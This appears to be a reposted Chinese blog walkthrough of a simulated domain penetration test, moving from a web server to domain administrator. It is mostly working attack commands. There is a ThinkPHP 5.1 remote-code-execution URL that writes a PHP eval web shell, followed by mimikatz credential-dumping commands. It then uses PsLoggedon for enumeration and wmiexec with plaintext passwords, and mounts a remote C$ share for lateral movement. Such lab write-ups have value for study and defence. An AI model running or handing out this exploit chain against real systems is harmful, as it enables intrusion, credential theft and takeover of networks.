一次模擬實戰(下)-域環境滲透
阿新 • • 發佈:2021-01-19
【資訊收集】
訪問80埠發現網站使用了thinkphp5.1版本
【漏洞利用】
搜尋thinkphp使用的事5.1版本
https://www.vulnspy.com/cn-thinkphp-5.x-rce/
寫入一句話:
http://192.168.43.35/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=x.php&vars[1][]=%3C?php%20@eval($_POST[%27cmd%27]);?%3E
蟻劍連結
【內網資訊收集】
發現是域環境,但是域內主機不多
【橫向移動】
上傳mimikatz 抓取當前主機雜湊
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt`
type log.txt
這是抓取到本地PC賬戶和administrator使用者名稱和密碼
因為開啟3389,使用administrator使用者連線
這時候上傳PsLoggedon (它通過檢驗登錄檔裡HKEY_USERS的key值來查詢誰登陸過機器,同樣也呼叫到了NetSessionEnum API)
PsLoggedon.exe /accetpeula administrator
這時我們發現域控登入過“CHENGCHENG”這臺主機
查詢”CHENGCHENG”主機IP 為“172.16.12.18”
我們發下CHENGCHENG本地管理員使用者和CHANGSHENG本地管理員使用者密碼一樣!
上傳“wmiexec”做掛載,目的上傳mimikatz
wmiexec.exe CHENGCHENG/administrator:[email protected] "hostname"
掛載CHENGCHENG遠端的C盤到本地f盤
net use f: \\chengcheng\c$ 110110zccZCC /user:chengcheng\administrator
將mimikatz拷貝至CHENGCHENG C:
執行mimikatz
wmiexec.exe chengcheng/administrator:[email protected] "c:\phpstudy_pro\WWW\thinkphp-5.1.29\html\public\run.bat"
至此,成功拿下域管理員